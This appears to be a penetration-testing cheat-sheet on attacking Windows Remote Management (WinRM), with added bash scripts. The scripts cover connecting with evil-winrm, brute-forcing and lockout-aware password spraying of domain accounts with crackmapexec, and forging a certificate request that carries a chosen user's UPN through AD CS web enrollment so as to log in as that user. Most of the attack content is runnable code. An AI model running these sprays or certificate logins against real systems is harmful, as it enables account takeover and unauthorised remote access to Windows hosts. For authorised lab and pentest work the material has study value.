WinRM
Port: 5985 (HTTP), 5986 (HTTPS)
Enable WinRM
We first have to configure our attack machine to work with WinRM as well: enable PS Remoting (Enable-PSRemoting) and add any "victims" to the WinRM client's TrustedHosts list (WSMan:\localhost\Client\TrustedHosts). Both changes are made from an elevated PowerShell prompt.
Connecting to WinRM
evil-winrm will not connect to a bare IPv6 literal. Add an entry to /etc/hosts that maps a hostname to the IPv6 address and connect to that hostname instead.
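An added example, not from the original notes: a small bash wrapper around evil-winrm that handles the IPv6 case above by writing the /etc/hosts alias itself and then picks the plain 5985 or the TLS 5986 listener. The alias name, the HOSTS_FILE override and the credentials are illustration-only assumptions.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: connect with evil-winrm,
# giving IPv6 targets a hostname in /etc/hosts first (evil-winrm does not
# accept a bare IPv6 literal) and choosing HTTP/5985 or HTTPS/5986.
# Assumed: HOSTS_FILE may be pointed at a scratch file for dry runs.
set -euo pipefail

HOSTS_FILE="${HOSTS_FILE:-/etc/hosts}"

# True when the address contains a colon, i.e. is an IPv6 literal.
is_ipv6() {
  case "$1" in *:*) return 0 ;; *) return 1 ;; esac
}

# Print the value to pass to -i: IPv6 literals are aliased to $2 (default
# "winrm-target") in HOSTS_FILE, added only once; anything else is echoed back.
winrm_target() {
  local addr="$1" alias="${2:-winrm-target}"
  if is_ipv6 "$addr"; then
    if ! grep -qE "^[^#]*[[:space:]]${alias}([[:space:]]|\$)" "$HOSTS_FILE" 2>/dev/null; then
      printf '%s\t%s\n' "$addr" "$alias" >> "$HOSTS_FILE"
    fi
    printf '%s\n' "$alias"
  else
    printf '%s\n' "$addr"
  fi
}

# winrm_connect <addr> <user> <password> [ssl yes|no] [alias]
# ssl=yes uses -S and port 5986, the fix when 5985 only yields an SSL error.
winrm_connect() {
  local host
  host="$(winrm_target "$1" "${5:-winrm-target}")"
  if [ "${4:-no}" = "yes" ]; then
    evil-winrm -i "$host" -u "$2" -p "$3" -S -P 5986
  else
    evil-winrm -i "$host" -u "$2" -p "$3" -P 5985
  fi
}

# Usage (writing /etc/hosts needs root):
#   winrm_connect dead:beef::1 Administrator 'P@ssw0rd' no dc01.lab
```

Run it as root (or point HOSTS_FILE at a file you own) because the alias is appended to /etc/hosts; the grep guard keeps repeated connections from piling up duplicate entries.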
WinRM shell
Download the winrm_shell.rb script and edit its connection settings (endpoint, username, password) for the target.
In case of an SSL error, change the endpoint port from 5985 to 5986 and use an https:// endpoint.
Brute-Force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
This tries every password against every user. Check the domain lockout threshold first (crackmapexec smb <IP> --pass-pol) and prefer spraying one password across all users per round rather than a full user x password brute-force.
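An added example, not from the original notes: a lockout-aware spray wrapper around the crackmapexec command above. It sends one password per round to the whole user list and pauses for the observation window before a round could push any account to the lockout threshold. The threshold and window defaults, and the CME override used for dry runs, are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: a lockout-aware password
# spray over WinRM using crackmapexec. Each round sends ONE password to every
# user; after (threshold - 1) rounds it waits out the lockout observation
# window so no account reaches the bad-password threshold.
# Assumed: CME can be pointed at a stub command for dry runs.
set -euo pipefail

CME="${CME:-crackmapexec}"
LOCKOUT_THRESHOLD="${LOCKOUT_THRESHOLD:-5}"      # from the domain password policy
OBSERVATION_WINDOW="${OBSERVATION_WINDOW:-1800}" # seconds; 30 min is a common default

# spray_winrm <ip> <domain> <users.txt> <passwords.txt> [threshold] [window]
# Prints the number of spray rounds executed.
spray_winrm() {
  local ip="$1" domain="$2" users="$3" passwords="$4"
  local threshold="${5:-$LOCKOUT_THRESHOLD}" window="${6:-$OBSERVATION_WINDOW}"
  local rounds=0 pw
  while IFS= read -r pw || [ -n "$pw" ]; do
    [ -z "$pw" ] && continue   # skip blank lines in the wordlist
    # Pause before the round that would take the per-account counter to the threshold.
    if [ "$threshold" -gt 1 ] && [ "$rounds" -gt 0 ] \
       && [ $(( rounds % (threshold - 1) )) -eq 0 ]; then
      sleep "$window"
    fi
    # -u takes the user list, -p a single password; --continue-on-success keeps
    # testing the remaining users after the first valid login.
    "$CME" winrm "$ip" -d "$domain" -u "$users" -p "$pw" --continue-on-success
    rounds=$((rounds + 1))
  done < "$passwords"
  printf '%s\n' "$rounds"
}

# Usage:
#   LOCKOUT_THRESHOLD=5 OBSERVATION_WINDOW=1800 \
#     spray_winrm 10.10.10.5 LAB.LOCAL users.txt passwords.txt
```

One caveat of the CME interface: -p accepts either a literal or a file, so a password that happens to match an existing filename is read as a wordlist; keep the working directory free of such names.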
Certificate-based Authentication
Certificate-based (password-less) authentication is possible with a client certificate signed by the domain's AD CS CA. On the target side the WinRM service must have certificate authentication enabled (it is off by default) and an HTTPS listener on 5986; the certificate needs the Client Authentication EKU and the user's UPN in the subjectAltName, and it must be mapped to an account in the WSMan ClientCertificate store. Note that WinRM only maps certificates to local accounts.
Pre-requisite: access to Active Directory Certificate Services (web enrollment).
Default location:
http://<IP>/certsrv/
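An added example, not from the original notes: generating the key pair and CSR for the certificate authentication described above and, once AD CS has signed it, logging in with evil-winrm. The CSR carries the two things WinRM checks for, a Client Authentication EKU and the UPN as an otherName SAN. The file prefix, user name and UPN are the caller's values; the certsrv submission step itself is done in the browser.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: build a key pair and a CSR
# suitable for WinRM certificate authentication, then log in with evil-winrm
# once AD CS has signed it.
# Assumed names: the output prefix, CN and UPN are whatever the caller passes.
set -euo pipefail

UPN_OID="1.3.6.1.4.1.311.20.2.3"   # Microsoft User Principal Name otherName

# make_winrm_csr <out_prefix> <cn> <upn>
# Writes <out_prefix>.key and <out_prefix>.csr; prints the CSR path.
make_winrm_csr() {
  local prefix="$1" cn="$2" upn="$3"
  openssl req -new -newkey rsa:2048 -nodes -sha256 \
    -keyout "${prefix}.key" -out "${prefix}.csr" \
    -subj "/CN=${cn}" \
    -addext "extendedKeyUsage=clientAuth" \
    -addext "subjectAltName=otherName:${UPN_OID};UTF8:${upn}"
  printf '%s\n' "${prefix}.csr"
}

# Submit <prefix>.csr through http://<IP>/certsrv/ (advanced request,
# "Submit a certificate request by using a base-64-encoded ... PKCS #10 file"),
# download the issued certificate Base64-encoded as <prefix>.crt, then:
#
# winrm_cert_connect <host> <prefix>
winrm_cert_connect() {
  local host="$1" prefix="$2"
  # Certificate auth is only offered on the HTTPS listener, hence -S / 5986.
  evil-winrm -i "$host" -S -P 5986 -c "${prefix}.crt" -k "${prefix}.key"
}

# Usage:
#   make_winrm_csr alice alice alice@lab.local
#   winrm_cert_connect dc01.lab alice
```

Check the issued certificate before trying to log in: AD CS only keeps a SAN supplied in the request when the template allows the subject to be supplied in the request or the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set; otherwise it builds the SAN from the requester's own account.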
Script Link (WinRM shell, winrm_shell.rb): https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb